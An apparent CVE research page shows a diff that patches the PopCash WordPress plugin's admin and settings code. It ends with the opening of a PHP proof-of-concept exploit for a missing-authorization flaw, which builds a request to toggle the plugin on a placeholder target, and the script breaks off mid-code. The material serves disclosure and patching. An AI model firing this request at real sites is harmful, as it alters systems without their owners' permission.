-    add_menu_page('PopCash', 'Popcash', 'administrator', 'popcash-net', 'pcit_popcash_popcash_net_publisher_code', 'data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDIwMDEwOTA0Ly9FTiIKICJodHRwOi8vd3d3LnczLm9yZy9UUi8yMDAxL1JFQy1TVkctMjAwMTA5MDQvRFREL3N2ZzEwLmR0ZCI+CjxzdmcgdmVyc2lvbj0iMS4wIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciCiB3aWR0aD0iMjU2LjAwMDAwMHB0IiBoZWlnaHQ9IjI1Ni4wMDAwMDBwdCIgdmlld0JveD0iMCAwIDI1Ni4wMDAwMDAgMjU2LjAwMDAwMCIKIHByZXNlcnZlQXNwZWN0UmF0aW89InhNaWRZTWlkIG1lZXQiPgoKPGcgdHJhbnNmb3JtPSJ0cmFuc2xhdGUoMC4wMDAwMDAsMjU2LjAwMDAwMCkgc2NhbGUoMC4xMDAwMDAsLTAuMTAwMDAwKSIKZmlsbD0iIzAwMDAwMCIgc3Ryb2tlPSJub25lIj4KPHBhdGggZD0iTTEwMzUgMjQ5NSBjLTI4NiAtNjMgLTU1OSAtMjQwIC03MzUgLTQ3NiAtMTA1IC0xNDIgLTE5NyAtMzUyIC0yMzEKLTUyOSAtMTYgLTg3IC0xNiAtMzM3IDAgLTQzMCA1NCAtMzA5IDIzMCAtNTk3IDQ4MCAtNzg2IDExNCAtODYgMjk4IC0xNzcgNDI1Ci0yMDkgMTQ3IC0zNyAxMzYgLTQ1IDEzNiA5MCAwIDg0IC0zIDExNyAtMTIgMTE5IC0yMDIgNTggLTM3NCAxNDIgLTUxOCAyNTUKbC0yNCAxOSAxMTkgMTgxIGM2NiA5OSAxMjMgMTgxIDEyNyAxODEgNCAwIDQ2IC0yNSA5MyAtNTYgOTkgLTY1IDIwMCAtMTEzCjMwNSAtMTQ2IDYwIC0xOCA5NyAtMjMgMTkwIC0yMyAxMDAgMCAxMjAgMyAxNTcgMjMgNTEgMjcgNzMgNjUgNzMgMTI1IDAgODcKLTU2IDEyMiAtMzU0IDIyMSAtMTA5IDM3IC0yMzkgODcgLTI4OSAxMTMgLTE0NyA3NiAtMjUwIDE4NSAtMjk5IDMxOSAtMTggNDkKLTIxIDgwIC0yMiAxODkgMCAxMTQgMyAxNDAgMjcgMjEwIDMyIDk3IDkwIDE4OCAxNTggMjQ5IDQ3IDQyIDE5NCAxMjUgMjQ3CjEzOCAyMSA2IDIyIDEwIDIyIDEyMiAwIDY0IC0zIDExNiAtNyAxMTUgLTUgMCAtMzUgLTcgLTY4IC0xNHoiLz4KPHBhdGggZD0iTTE0ODAgMjM5MSBsMCAtMTA4IDExOCAtMzIgYzEyOSAtMzQgMjQ0IC03OCAzMzkgLTEzMCA3OSAtNDIgOTggLTYzCjg0IC04OCAtNiAtMTAgLTQ3IC05NCAtOTIgLTE4OCAtNDQgLTkzIC04MiAtMTcxIC04NCAtMTczIC0xIC0yIC01NiAyNCAtMTIxCjU3IC0yMzEgMTE1IC0zODQgMTQ1IC00OTIgOTQgLTQwIC0xOSAtNjIgLTU5IC02MiAtMTEyIDAgLTc1IDY3IC0xMjMgMjkwCi0yMDYgMzU3IC0xMzQgNDgwIC0yMTkgNTY2IC0zOTEgMzMgLTY1IDM2IC04MCA0MSAtMTg1IDQgLTcwIDEgLTE0MSAtNiAtMTgzCi0xNSAtODggLTc1IC0yMDcgLTE0MCAtMjc4IC05MSAtOTkgLTI0MSAtMTg0IC0zNzMgLTIxMSBsLTYzIC0xMyAtMyAtMTAyIC0zCi0xMDMgMjggNyBjMjMxIDUzIDM5OCAxMzQgNTY3IDI3NiAyNjkgMjI2IDQyNSA1NDEgNDQzIDg5NCAxMCAxOTkgLTI5IDM5NQotMTE1IDU3NyAtNjYgMTQwIC0xMzggMjQyIC0yNDcgMzUzIC0xMzIgMTMzIC0yNTcgMjE2IC00MzUgMjg4IC01MCAyMCAtMjEzCjY2IC0yMzYgNjYgLTIgMCAtNCAtNDkgLTQgLTEwOXoiLz4KPC9nPgo8L3N2Zz4K');
-
-
-  }
-}
-
-$popcash_it_vars = (object) [
-  'uid'         => get_option('popcash_net_uid'),
-  'wid'         => get_option('popcash_net_wid'),
-  'fallback'    => get_option('popcash_net_fallback'),
-  'fcap'        => get_option('popcash_net_fcap'),
-  'apiKey'      => get_option('popcash_net_api_key'),
-  'integration' => get_option('popcash_net_integration'),
-];
-
-require('functions.php');
-
-if (get_option('popcash_net_disabled') == false) {
-  if ((($popcash_it_vars->apiKey) != null) && ($popcash_it_vars->wid) != null && $popcash_it_vars->integration == 2) {
-    add_action('wp_footer', 'pcit_popcash_add_aab');
-  } elseif ((($popcash_it_vars->uid) != null) && ($popcash_it_vars->wid) != null  && $popcash_it_vars->integration == 1) {
-    add_action('wp_footer', 'pcit_popcash_add_individual_ids');
-  }
+/**
+ * Plugin Name: PopCash Code Integration Tool
+ * Plugin URI: https://popcash.net/
+ * Description: PopCash Popunder code integration plugin with improved security and code structure
+ * Version: 2.0
+ * Author: PopCash
+ * Author URI: https://popcash.net/
+ * Text Domain: popcash-code-integration-tool
+ * Requires at least: 5.0
+ * Requires PHP: 7.0
+ * License: GPLv2 or later
+ * License URI: https://www.gnu.org/licenses/gpl-2.0.html
+ *
+ * @package PopCash_Code_Integration
+ */
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
+
+// Define plugin constants
+define( 'PCIT_VERSION', '1.9' );
+define( 'PCIT_PLUGIN_DIR', plugin_dir_path( __FILE__ ) );
+define( 'PCIT_PLUGIN_URL', plugin_dir_url( __FILE__ ) );
+define( 'PCIT_PLUGIN_BASENAME', plugin_basename( __FILE__ ) );
+
+/**
+ * Load plugin classes
+ */
+require_once PCIT_PLUGIN_DIR . 'includes/class-activator.php';
+require_once PCIT_PLUGIN_DIR . 'includes/class-settings.php';
+require_once PCIT_PLUGIN_DIR . 'includes/class-frontend.php';
+
+// Load legacy functions for backward compatibility (admin interface)
+require_once PCIT_PLUGIN_DIR . 'functions.php';
+
+/**
+ * Activation hook
+ */
+register_activation_hook( __FILE__, [ 'PCIT_Activator', 'activate' ] );
+
+/**
+ * Deactivation hook
+ */
+register_deactivation_hook( __FILE__, [ 'PCIT_Activator', 'deactivate' ] );
+
+/**
+ * Initialize plugin
+ */
+function pcit_init() {
+    // Initialize frontend
+    PCIT_Frontend::init();
+
+    // Load admin functionality
+    if ( is_admin() ) {
+        pcit_admin_init();
+    }
+}
+add_action( 'plugins_loaded', 'pcit_init' );
+
+/**
+ * Admin initialization
+ * Keeps legacy admin interface for now
+ */
+function pcit_admin_init() {
+    add_action( 'admin_menu', 'pcit_popcash_popcash_net_admin_menu' );
+    add_action( 'admin_init', 'pcit_popcash_register_mysettings' );
+    add_action( 'admin_enqueue_scripts', 'pcit_popcash_load_custom_wp_admin_style' );
+    add_action( 'wp_loaded', 'pcit_popcash_switch_enabled' );
+}
+
+/**
+ * Register admin menu
+ */
+function pcit_popcash_popcash_net_admin_menu() {
+    add_menu_page(
+        __( 'PopCash', 'popcash-code-integration-tool' ),
+        __( 'PopCash', 'popcash-code-integration-tool' ),
+        'manage_options',
+        'popcash-net',
+        'pcit_popcash_popcash_net_publisher_code',
+        'data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDIwMDEwOTA0Ly9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSLzIwMDEvUkVDLVNWRy0yMDAxMDkwNC9EVEQvc3ZnMTAuZHRkIj4KPHN2ZyB2ZXJzaW9uPSIxLjAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgd2lkdGg9IjI1Ni4wMDAwMDBwdCIgaGVpZ2h0PSIyNTYuMDAwMDAwcHQiIHZpZXdCb3g9IjAgMCAyNTYuMDAwMDAwIDI1Ni4wMDAwMDAiIHByZXNlcnZlQXNwZWN0UmF0aW89InhNaWRZTWlkIG1lZXQiPgo8ZyB0cmFuc2Zvcm09InRyYW5zbGF0ZSgwLjAwMDAwMCwyNTYuMDAwMDAwKSBzY2FsZSgwLjEwMDAwMCwtMC4xMDAwMDApIiBmaWxsPSJjdXJyZW50Q29sb3IiIHN0cm9rZT0ibm9uZSI+CjxwYXRoIGQ9Ik0xMDM1IDI0OTUgYy0yODYgLTYzIC01NTkgLTI0MCAtNzM1IC00NzYgLTEwNSAtMTQyIC0xOTcgLTM1MiAtMjMxIC01MjkgLTE2IC04NyAtMTYgLTMzNyAwIC00MzAgNTQgLTMwOSAyMzAgLTU5NyA0ODAgLTc4NiAxMTQgLTg2IDI5OCAtMTc3IDQyNSAtMjA5IDE0NyAtMzcgMTM2IC00NSAxMzYgOTAgMCA4NCAtMyAxMTcgLTEyIDExOSAtMjAyIDU4IC0zNzQgMTQyIC01MTggMjU1IGwtMjQgMTkgMTE5IDE4MSBjNjYgOTkgMTIzIDE4MSAxMjcgMTgxIDQgMCA0NiAtMjUgOTMgLTU2IDk5IC02NSAyMDAgLTExMyAzMDUgLTE0NiA2MCAtMTggOTcgLTIzIDE5MCAtMjMgMTAwIDAgMTIwIDMgMTU3IDIzIDUxIDI3IDczIDY1IDczIDEyNSAwIDg3IC01NiAxMjIgLTM1NCAyMjEgLTEwOSAzNyAtMjM5IDg3IC0yODkgMTEzIC0xNDcgNzYgLTI1MCAxODUgLTI5OSAzMTkgLTE4IDQ5IC0yMSA4MCAtMjIgMTg5IDAgMTE0IDMgMTQwIDI3IDIxMCAzMiA5NyA5MCAxODggMTU4IDI0OSA0NyA0MiAxOTQgMTI1IDI0NyAxMzggMjEgNiAyMiAxMCAyMiAxMjIgMCA2NCAtMyAxMTYgLTcgMTE1IC01IDAgLTM1IC03IC02OCAtMTR6Ii8+CjxwYXRoIGQ9Ik0xNDgwIDIzOTEgbDAgLTEwOCAxMTggLTMyIGMxMjkgLTM0IDI0NCAtNzggMzM5IC0xMzAgNzkgLTQyIDk4IC02MyA4NCAtODggLTYgLTEwIC00NyAtOTQgLTkyIC0xODggLTQ0IC05MyAtODIgLTE3MSAtODQgLTE3MyAtMSAtMiAtNTYgMjQgLTEyMSA1NyAtMjMxIDExNSAtMzg0IDE0NSAtNDkyIDk0IC00MCAtMTkgLTYyIC01OSAtNjIgLTExMiAwIC03NSA2NyAtMTIzIDI5MCAtMjA2IDM1NyAtMTM0IDQ4MCAtMjE5IDU2NiAtMzkxIDMzIC02NSAzNiAtODAgNDEgLTE4NSA0IC03MCAxIC0xNDEgLTYgLTE4MyAtMTUgLTg4IC03NSAtMjA3IC0xNDAgLTI3OCAtOTEgLTk5IC0yNDEgLTE4NCAtMzczIC0yMTEgbC02MyAtMTMgLTMgLTEwMiAtMyAtMTAzIDI4IDcgYzIzMSA1MyAzOTggMTM0IDU2NyAyNzYgMjY5IDIyNiA0MjUgNTQxIDQ0MyA4OTQgMTAgMTk5IC0yOSAzOTUgLTExNSA1NzcgLTY2IDE0MCAtMTM4IDI0MiAtMjQ3IDM1MyAtMTMyIDEzMyAtMjU3IDIxNiAtNDM1IDI4OCAtNTAgMjAgLTIxMyA2NiAtMjM2IDY2IC0yIDAgLTQgLTQ5IC00IC0xMDl6Ii8+CjwvZz4KPC9zdmc+Cg=='
+    );
+}
+
+/**
+ * Register settings
+ */
+function pcit_popcash_register_mysettings() {
+    // Group 1: Standard Script
+    register_setting( 'myoption-group', 'popcash_net_disabled', 'pcit_popcash_switch_enabled' );
+    register_setting( 'myoption-group', 'popcash_net_uid', [ 'PCIT_Settings', 'validate_uid' ] );
+    register_setting( 'myoption-group', 'popcash_net_wid', [ 'PCIT_Settings', 'validate_wid' ] );
+    register_setting( 'myoption-group', 'popcash_net_fallback', [ 'PCIT_Settings', 'validate_fallback' ] );
+
+    // Group 2: Anti-Adblock Script
+    register_setting( 'myoption-group3', 'popcash_net_uid', [ 'PCIT_Settings', 'validate_uid' ] );
+    register_setting( 'myoption-group3', 'popcash_net_wid', [ 'PCIT_Settings', 'validate_wid' ] );
+    register_setting( 'myoption-group3', 'popcash_net_fallback', [ 'PCIT_Settings', 'validate_fallback' ] );
+    register_setting( 'myoption-group3', 'popcash_net_api_key' );
+    register_setting( 'myoption-group3', 'popcash_net_fcap' );
+}
+
+/**
+ * Load admin assets
+ */
+function pcit_popcash_load_custom_wp_admin_style( $hook ) {
+    // Only load on plugin page
+    if ( 'toplevel_page_popcash-net' !== $hook ) {
+        return;
+    }
+
+    // Enqueue WordPress Dashicons (for icons)
+    wp_enqueue_style( 'dashicons' );
+
+    // Enqueue our custom admin CSS (no Bootstrap!)
+    wp_enqueue_style(
+        'pcit-admin-style',
+        PCIT_PLUGIN_URL . 'assets/pcit-admin.css',
+        [],
+        PCIT_VERSION
+    );
 }
--- a/popcashnet-code-integration-tool/template/form-aab.php
+++ b/popcashnet-code-integration-tool/template/form-aab.php
@@ -0,0 +1,283 @@
+<?php
+/**
+ * Anti-Adblock Script Form - Modern WordPress UI
+ *
+ * @package PopCash_Code_Integration
+ * @since 1.9
+ */
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+?>
+
+<form method="post" action="options.php">
+    <?php
+    settings_fields( 'myoption-group3' );
+    do_settings_fields( 'popcash-net', 'myoption-group3' );
+
+    // Clean up old cache files when settings are updated
+    if ( isset( $_GET['settings-updated'] ) && $_GET['settings-updated'] == 'true' && checkIntegration( 2 ) ) {
+        array_map( 'unlink', glob( plugin_dir_path( dirname( __FILE__ ) ) . 'ppch-h6IzF4iRLEdZV-QX82hhpzmvxX--*' ) );
+    }
+
+    $just_saved = isset( $_GET['settings-updated'] ) && $_GET['settings-updated'] == 'true' && checkIntegration( 2 );
+    ?>
+
+    <!-- Info Box -->
+    <div class="pcit-info-box">
+        <h4><?php esc_html_e( 'Anti-Adblock Integration', 'popcash-code-integration-tool' ); ?></h4>
+        <p><?php esc_html_e( 'Enter your PopCash API Key and Website ID to enable the Anti-Adblock feature.', 'popcash-code-integration-tool' ); ?></p>
+        <p><strong><?php esc_html_e( 'Important:', 'popcash-code-integration-tool' ); ?></strong> <?php esc_html_e( 'If you are using an ad blocker, please disable it before saving these settings.', 'popcash-code-integration-tool' ); ?></p>
+    </div>
+
+    <!-- Validation Errors -->
+    <?php settings_errors( 'popcash_net_api_key' ); ?>
+    <?php settings_errors( 'popcash_net_wid' ); ?>
+    <?php settings_errors( 'popcash_net_fallback' ); ?>
+    <?php settings_errors( 'popcash_net_fcap' ); ?>
+
+    <!-- Hidden UID field (not used in AAB but kept for compatibility) -->
+    <input type="hidden" name="popcash_net_uid" value="<?php echo esc_attr( get_option( 'popcash_net_uid' ) ); ?>" />
+
+    <!-- API Key Field -->
+    <div class="pcit-form-row">
+        <div class="pcit-form-label">
+            <label for="popcash_net_api_key">
+                <?php esc_html_e( 'API Key', 'popcash-code-integration-tool' ); ?>
+                <span class="required" style="color: #d63638;">*</span>
+            </label>
+        </div>
+        <div class="pcit-form-field">
+            <input
+                type="text"
+                id="popcash_net_api_key"
+                name="popcash_net_api_key"
+                value="<?php echo esc_attr( get_option( 'popcash_net_api_key' ) ); ?>"
+                class="regular-text code"
+                placeholder="<?php esc_attr_e( 'Enter your PopCash API Key', 'popcash-code-integration-tool' ); ?>"
+            />
+            <p class="description">
+                <?php esc_html_e( 'Your PopCash API Key for Anti-Adblock integration (found in your dashboard)', 'popcash-code-integration-tool' ); ?>
+            </p>
+        </div>
+    </div>
+
+    <!-- Website ID Field -->
+    <div class="pcit-form-row">
+        <div class="pcit-form-label">
+            <label for="popcash_net_wid">
+                <?php esc_html_e( 'Website ID', 'popcash-code-integration-tool' ); ?>
+                <span class="required" style="color: #d63638;">*</span>
+            </label>
+        </div>
+        <div class="pcit-form-field">
+            <input
+                type="number"
+                id="popcash_net_wid"
+                name="popcash_net_wid"
+                value="<?php echo esc_attr( get_option( 'popcash_net_wid' ) ); ?>"
+                class="regular-text"
+                placeholder="<?php esc_attr_e( 'Enter your Website ID', 'popcash-code-integration-tool' ); ?>"
+            />
+            <p class="description">
+                <?php esc_html_e( 'Your PopCash Website ID for this domain (numeric value from your dashboard)', 'popcash-code-integration-tool' ); ?>
+            </p>
+        </div>
+    </div>
+
+    <!-- Fallback Option -->
+    <div class="pcit-form-row">
+        <div class="pcit-form-label">
+            <label for="popcash_net_fallback">
+                <?php esc_html_e( 'Fallback Behavior', 'popcash-code-integration-tool' ); ?>
+            </label>
+        </div>
+        <div class="pcit-form-field">
+            <select id="popcash_net_fallback" name="popcash_net_fallback" class="regular-text">
+                <option value="0" <?php selected( get_option( 'popcash_net_fallback' ), '0' ); ?>>
+                    <?php esc_html_e( 'Tabunder (Open under current tab)', 'popcash-code-integration-tool' ); ?>
+                </option>
+                <option value="1" <?php selected( get_option( 'popcash_net_fallback' ), '1' ); ?>>
+                    <?php esc_html_e( 'Popup (Open in new window)', 'popcash-code-integration-tool' ); ?>
+                </option>
+            </select>
+            <p class="description">
+                <?php esc_html_e( 'Choose the fallback behavior if a popunder cannot be opened', 'popcash-code-integration-tool' ); ?>
+            </p>
+        </div>
+    </div>
+
+    <!-- Frequency Cap -->
+    <div class="pcit-form-row">
+        <div class="pcit-form-label">
+            <label for="popcash_net_fcap">
+                <?php esc_html_e( 'Frequency Cap', 'popcash-code-integration-tool' ); ?>
+            </label>
+        </div>
+        <div class="pcit-form-field">
+            <select
+                id="popcash_net_fcap"
+                name="popcash_net_fcap"
+                class="small-text"
+            >
+                <option value="1" selected>1</option>
+            </select>
+            <span class="spinner" id="pcit-fcap-spinner" style="float: none; margin: 0 10px; visibility: hidden;"></span>
+            <p class="description">
+                <?php esc_html_e( 'Maximum number of ads to show per user within 24 hours (retrieved from PopCash API)', 'popcash-code-integration-tool' ); ?>
+            </p>
+            <p class="description" id="pcit-api-error" style="color: #d63638; display: none;">
+                <?php esc_html_e( 'Invalid API Key or Website ID. Please check your credentials.', 'popcash-code-integration-tool' ); ?>
+            </p>
+        </div>
+    </div>
+
+    <?php if ( $just_saved ) : ?>
+    <input type="hidden" name="popcash_net_uid1" value="popcash_net_uid" />
+    <input type="hidden" name="popcash_net_api_key1" value="popcash_net_api_key" />
+    <input type="hidden" name="popcash_net_wid1" value="popcash_net_wid" />
+    <input type="hidden" name="popcash_net_fallback1" value="popcash_net_fallback" />
+    <input type="hidden" name="popcash_net_fcap1" value="popcash_net_fcap" />
+    <?php endif; ?>
+
+    <input type="hidden" name="action" value="update" />
+
+    <!-- Submit Button -->
+    <div class="pcit-submit-section">
+        <button
+            type="submit"
+            name="submit"
+            id="pcit-submit-aab"
+            class="button button-primary button-large"
+        >
+            <?php esc_html_e( 'Save Changes', 'popcash-code-integration-tool' ); ?>
+        </button>
+
+        <p class="description" id="pcit-submit-error-aab" style="margin-top: 10px; color: #d63638; display: none;">
+            <?php esc_html_e( 'Please fill in both API Key and Website ID to save settings.', 'popcash-code-integration-tool' ); ?>
+        </p>
+    </div>
+
+</form>
+
+<script type="text/javascript">
+(function($) {
+    'use strict';
+
+    $(document).ready(function() {
+        var $apiKey = $('#popcash_net_api_key');
+        var $wid = $('#popcash_net_wid');
+        var $fcap = $('#popcash_net_fcap');
+        var $submit = $('#pcit-submit-aab');
+        var $error = $('#pcit-submit-error-aab');
+        var $apiError = $('#pcit-api-error');
+        var $spinner = $('#pcit-fcap-spinner');
+
+        // Store initial values
+        var initialApiKey = $apiKey.val().trim();
+        var initialWid = $wid.val().trim();
+        var hadInitialValues = (initialApiKey !== '' || initialWid !== '');
+        var validationTimer = null;
+        var savedFcap = '<?php echo esc_js( get_option( 'popcash_net_fcap', '1' ) ); ?>';
+
+        function debounce(func, wait) {
+            return function() {
+                var context = this, args = arguments;
+                clearTimeout(validationTimer);
+                validationTimer = setTimeout(function() {
+                    func.apply(context, args);
+                }, wait);
+            };
+        }
+
+        function validateApiKey() {
+            var apiKeyValue = $apiKey.val().trim();
+            var widValue = $wid.val().trim();
+
+            if (!apiKeyValue || !widValue) {
+                return;
+            }
+
+            $spinner.css('visibility', 'visible');
+            $apiError.hide();
+
+            $.ajax({
+                method: 'GET',
+                url: 'https://api.popcash.net/websites/' + widValue + '/fcap?apikey=' + apiKeyValue,
+                timeout: 5000
+            }).done(function(response) {
+                $apiError.hide();
+                $spinner.css('visibility', 'hidden');
+
+                // Populate fcap dropdown
+                if (response.fcap) {
+                    $fcap.empty();
+                    for (var i = 1; i <= response.fcap; i++) {
+                        var selected = (i == savedFcap) ? ' selected' : '';
+                        $fcap.append('<option value="' + i + '"' + selected + '>' + i + '</option>');
+                    }
+                }
+
+                // Auto-fill UID if provided
+                if (response.uid) {
+                    $('input[name="popcash_net_uid"]').val(response.uid);
+                }
+
+                $error.hide();
+            }).fail(function() {
+                $spinner.css('visibility', 'hidden');
+                $apiError.show();
+
+                // Reset fcap to default but allow saving
+                $fcap.empty();
+                $fcap.append('<option value="1" selected>1</option>');
+            });
+        }
+
+        function checkFields() {
+            var apiKeyValue = $apiKey.val().trim();
+            var widValue = $wid.val().trim();
+
+            // If fields were initially empty and are still empty, disable button
+            if (!hadInitialValues && apiKeyValue === '' && widValue === '') {
+                $submit.prop('disabled', true);
+                $error.show();
+            } else if (apiKeyValue === '' || widValue === '') {
+                // Allow saving empty values to clear settings
+                $submit.prop('disabled', false);
+                $error.hide();
+            } else {
+                // Both fields have values, validate with API
+                $error.hide();
+            }
+        }
+
+        // Validate on page load if both fields are filled
+        if (initialApiKey && initialWid) {
+            validateApiKey();
+        } else {
+            // Set saved fcap value
+            $fcap.val(savedFcap);
+            checkFields();
+        }
+
+        // Validate on input with debounce
+        $apiKey.on('input', debounce(function() {
+            if ($apiKey.val().trim() && $wid.val().trim()) {
+                validateApiKey();
+            } else {
+                checkFields();
+            }
+        }, 1000));
+
+        $wid.on('input', debounce(function() {
+            if ($apiKey.val().trim() && $wid.val().trim()) {
+                validateApiKey();
+            } else {
+                checkFields();
+            }
+        }, 1000));
+    });
+})(jQuery);
+</script>
--- a/popcashnet-code-integration-tool/template/form-standard.php
+++ b/popcashnet-code-integration-tool/template/form-standard.php
@@ -0,0 +1,125 @@
+<?php
+/**
+ * Standard Script Form - Modern WordPress UI
+ *
+ * @package PopCash_Code_Integration
+ * @since 1.9
+ */
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+?>
+
+<form method="post" action="options.php">
+    <?php
+    settings_fields( 'myoption-group' );
+    do_settings_fields( 'popcash-net', 'myoption-group' );
+
+    // Clean up old cache files
+    array_map( 'unlink', glob( plugin_dir_path( dirname( __FILE__ ) ) . 'ppch-h6IzF4iRLEdZV-QX82hhpzmvxX--*' ) );
+
+    // Check if this integration was just activated
+    $just_saved = isset( $_GET['settings-updated'] ) && $_GET['settings-updated'] == 'true' && checkIntegration( 1 );
+    ?>
+
+    <!-- Info Box -->
+    <div class="pcit-info-box">
+        <h4><?php esc_html_e( 'Standard Script Integration', 'popcash-code-integration-tool' ); ?></h4>
+        <p><?php esc_html_e( 'Enter your User ID and Website ID from your PopCash dashboard to integrate the standard popunder script.', 'popcash-code-integration-tool' ); ?></p>
+    </div>
+
+    <!-- Validation Errors -->
+    <?php settings_errors( 'popcash_net_uid' ); ?>
+    <?php settings_errors( 'popcash_net_wid' ); ?>
+    <?php settings_errors( 'popcash_net_fallback' ); ?>
+
+    <!-- User ID Field -->
+    <div class="pcit-form-row">
+        <div class="pcit-form-label">
+            <label for="popcash_net_uid">
+                <?php esc_html_e( 'User ID', 'popcash-code-integration-tool' ); ?>
+                <span class="required" style="color: #d63638;">*</span>
+            </label>
+        </div>
+        <div class="pcit-form-field">
+            <input
+                type="number"
+                id="popcash_net_uid"
+                name="popcash_net_uid"
+                value="<?php echo esc_attr( get_option( 'popcash_net_uid' ) ); ?>"
+                class="regular-text"
+                placeholder="<?php esc_attr_e( 'Enter your User ID', 'popcash-code-integration-tool' ); ?>"
+            />
+            <p class="description">
+                <?php esc_html_e( 'Your PopCash User ID (numeric value from your dashboard)', 'popcash-code-integration-tool' ); ?>
+            </p>
+        </div>
+    </div>
+
+    <!-- Website ID Field -->
+    <div class="pcit-form-row">
+        <div class="pcit-form-label">
+            <label for="popcash_net_wid">
+                <?php esc_html_e( 'Website ID', 'popcash-code-integration-tool' ); ?>
+                <span class="required" style="color: #d63638;">*</span>
+            </label>
+        </div>
+        <div class="pcit-form-field">
+            <input
+                type="number"
+                id="popcash_net_wid"
+                name="popcash_net_wid"
+                value="<?php echo esc_attr( get_option( 'popcash_net_wid' ) ); ?>"
+                class="regular-text"
+                placeholder="<?php esc_attr_e( 'Enter your Website ID', 'popcash-code-integration-tool' ); ?>"
+            />
+            <p class="description">
+                <?php esc_html_e( 'Your PopCash Website ID for this domain (numeric value from your dashboard)', 'popcash-code-integration-tool' ); ?>
+            </p>
+        </div>
+    </div>
+
+    <!-- Fallback Option -->
+    <div class="pcit-form-row">
+        <div class="pcit-form-label">
+            <label for="popcash_net_fallback">
+                <?php esc_html_e( 'Fallback Behavior', 'popcash-code-integration-tool' ); ?>
+            </label>
+        </div>
+        <div class="pcit-form-field">
+            <select id="popcash_net_fallback" name="popcash_net_fallback" class="regular-text">
+                <option value="0" <?php selected( get_option( 'popcash_net_fallback' ), '0' ); ?>>
+                    <?php esc_html_e( 'Tabunder (Open under current tab)', 'popcash-code-integration-tool' ); ?>
+                </option>
+                <option value="1" <?php selected( get_option( 'popcash_net_fallback' ), '1' ); ?>>
+                    <?php esc_html_e( 'Popup (Open in new window)', 'popcash-code-integration-tool' ); ?>
+                </option>
+            </select>
+            <p class="description">
+                <?php esc_html_e( 'Choose the fallback behavior if a popunder cannot be opened', 'popcash-code-integration-tool' ); ?>
+            </p>
+        </div>
+    </div>
+
+    <?php if ( $just_saved ) : ?>
+    <input type="hidden" name="popcash_net_uid1" value="popcash_net_uid" />
+    <input type="hidden" name="popcash_net_wid1" value="popcash_net_wid" />
+    <input type="hidden" name="popcash_net_fallback1" value="popcash_net_fallback" />
+    <?php endif; ?>
+
+    <input type="hidden" name="action" value="update" />
+
+    <!-- Submit Button -->
+    <div class="pcit-submit-section">
+        <button
+            type="submit"
+            name="submit"
+            id="pcit-submit-standard"
+            class="button button-primary button-large"
+        >
+            <?php esc_html_e( 'Save Changes', 'popcash-code-integration-tool' ); ?>
+        </button>
+    </div>
+
+</form>
--- a/popcashnet-code-integration-tool/template/index-new.php
+++ b/popcashnet-code-integration-tool/template/index-new.php
@@ -0,0 +1,121 @@
+<?php
+/**
+ * Modern WordPress-native Admin Interface
+ * No Bootstrap - Clean WordPress UI
+ *
+ * @package PopCash_Code_Integration
+ * @since 1.9
+ */
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
+// Handle integration type update
+pcit_popcash_switch_enabled();
+if ( checkIntegration( 1 ) ) {
+    update_option( 'popcash_net_integration', 1 );
+}
+if ( checkIntegration( 2 ) ) {
+    update_option( 'popcash_net_integration', 2 );
+}
+
+$is_disabled = get_option( 'popcash_net_disabled' ) == '1';
+$current_tab = isset( $_GET['tab'] ) ? sanitize_text_field( $_GET['tab'] ) : 'standard-script';
+$integration_type = get_option( 'popcash_net_integration', '0' );
+?>
+
+<div class="wrap pcit-wrap">
+
+    <!-- Header -->
+    <div class="pcit-header">
+        <h1><?php esc_html_e( 'PopCash Code Integration', 'popcash-code-integration-tool' ); ?></h1>
+
+        <?php
+        $logo_url = plugins_url( 'images/logo.png', dirname( __FILE__ ) );
+        if ( file_exists( plugin_dir_path( dirname( __FILE__ ) ) . 'images/logo.png' ) ) :
+        ?>
+            <img src="<?php echo esc_url( $logo_url ); ?>" alt="PopCash" class="pcit-logo" />
+        <?php endif; ?>
+
+        <!-- Enable Button (only when disabled) -->
+        <?php if ( $is_disabled ) : ?>
+            <div class="pcit-status-toggle">
+                <?php
+                $nonce = wp_create_nonce( 'pcit_popcash_toggle_status' );
+                $toggle_url = admin_url( 'admin.php?page=popcash-net&tab=' . $current_tab . '&d_status=switch&_wpnonce=' . $nonce );
+                ?>
+                <a href="<?php echo esc_url( $toggle_url ); ?>" class="button button-primary">
+                    <?php esc_html_e( 'Enable PopUnder Code', 'popcash-code-integration-tool' ); ?>
+                </a>
+            </div>
+
+            <div class="pcit-alert error">
+                <p>
+                    <strong><?php esc_html_e( 'Warning:', 'popcash-code-int

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24619 - PopCash.Net Code Integration Tool <= 1.8 - Missing Authorization

<?php

$target_url = "https://target.com/wp-admin/admin.php";

// Parameters required for exploitation
$params = [
    'page' => 'popcash-net',
    'tab' => 'standard-script',  // Can also be 'aab-script'
    'd_status' => 'switch'
];

// Build the exploit URL
$exploit_url = $target_url . '?' . http_build_query($params);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
